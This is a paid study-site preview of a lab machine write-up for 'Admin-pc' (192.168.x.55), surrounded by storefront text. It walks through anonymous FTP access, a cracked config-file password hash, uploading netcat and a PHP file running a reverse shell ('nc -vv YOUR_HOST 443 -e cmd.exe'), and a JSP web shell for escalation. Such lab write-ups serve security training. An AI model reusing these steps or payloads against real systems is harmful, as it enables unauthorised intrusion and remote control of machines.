Software Engineering > DISCUSSION POST > Admin-pc machine (All)

Admin-pc machine

Document Content and Description Below

Admin-pc machine writeup Exploitation Scan the machine using nmap 192.168.x.55 -A One interesting part is the ftp service output Connect to the server and get the xampp config file Use user anon... ymous with any password 21/tcp open ftp syn-ack ttl 128 | fingerprint-strings: | GenericLines: | 220-Wellcome to Home Ftp Server! | Server ready. | command not understood. | command not understood. | Help: | 220-Wellcome to Home Ftp Server! | Server ready. | 'HELP': command not understood. | NULL, SMBProgNeg: | 220-Wellcome to Home Ftp Server! |_ Server ready. | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 . [NSE: writeabl |_drw-rw-rw- 1 ftp ftp 0 Dec 28 2015 .. [NSE: writeab Posts This study source was downloaded by 100000830919685 from CourseHero.com on 05-15-2022 11:45:49 GMT -05:00 https://www.coursehero.com/file/72266054/192168x55-Admin-pc-machine-writeup-Cyb3rsickpdf/← 192.168.x.161 – Ph33r machine writeup (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/20/192-168- x-161-ph33r-machine-writeup/) 192.168.x.53 – unreal tournament machine writeup → (http://web.archive.org/web/2019020509482 6/https://cyb3rsick.com/2019/01/22/192-168- x-53-unreal-tournament-machine-writeup/) the file contain the credentials fm:$apr1$yT3K79by$RbmkKdKGdaXs80zPCIZnR1 Crack the password, you will get the plaintext fm:x-files Now connect to 192.168.x.55:10433/admin which is file manager allowing executable files upload netcat.exe and then upload php file including system(‘nc –vv YOUR_HOST 443 –e cmd.exe’); to gain shell access Escalation Upload jsp shell file to c:/xampp/tomcat/webapps/examples then browse it using 192.168.x.55:10433/examples/cmd.jsp?cmd=whoami And you’re an admin [root:~/Desktop]# ftp ftp> o (to) 192.168.x.55 Connected to 192.168.x.55. 220-Wellcome to Home Ftp Server! 220 Server ready. Name (192.168.x.55:root): anonymous 331 Password required for anonymous. Password: 230 User Anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. [Show More]

Last updated: 2 years ago

Preview 1 out of 5 pages

Buy Now

Instant download

We Accept:

We Accept
document-preview

Buy this document to get the full access instantly

Instant Download Access after purchase

Buy Now

Instant download

We Accept:

We Accept
Report Copyright Violation

Reviews( 0 )

DISCUSSION POST

$7.00

Buy Now

We Accept:

We Accept

Instant download

Can't find what you want? Try our AI powered Search

139
0

Document information

Connected school, study & course

About the document

Uploaded On

Jul 24, 2022

Number of pages

5

Written in

Type

DISCUSSION POST

Seller

seller-icon
CourseWorks,Inc

Member since 2 years

8 Documents Sold

Reviews Received
2
0
0
0
0
Send Message
Additional information

This document has been written for:

Course

Software Engineering

Category

DISCUSSION POST

Uploaded

Jul 24, 2022

Downloads

 0

Views

 139

Document Keyword Tags

More From CourseWorks,Inc

View all CourseWorks,Inc's documents »

Recommended For You

Get more on DISCUSSION POST »
$7.00
Buy Now
What is Scholarfriends

In Scholarfriends, a student can earn by offering help to other student. Students can help other students with materials by upploading their notes and earn money.

Get to know us
About Us
Privacy Statement
Refund Policy
Terms and Conditions
Contact Us
Blog
We are here to help

We're available through e-mail, Twitter, Facebook, and live chat.
 FAQ
 Questions? Leave a message!

Follow us on
 Twitter
Useful links
  • Solutions Manuals for Accounting, Business, Economics and Management Text Books. The Popular and the Latest.
  • Popular NURSING Test Banks
  • Courses
  • Categories
    • We accept

    payment cards

    Copyright © Scholarfriends · High quality services·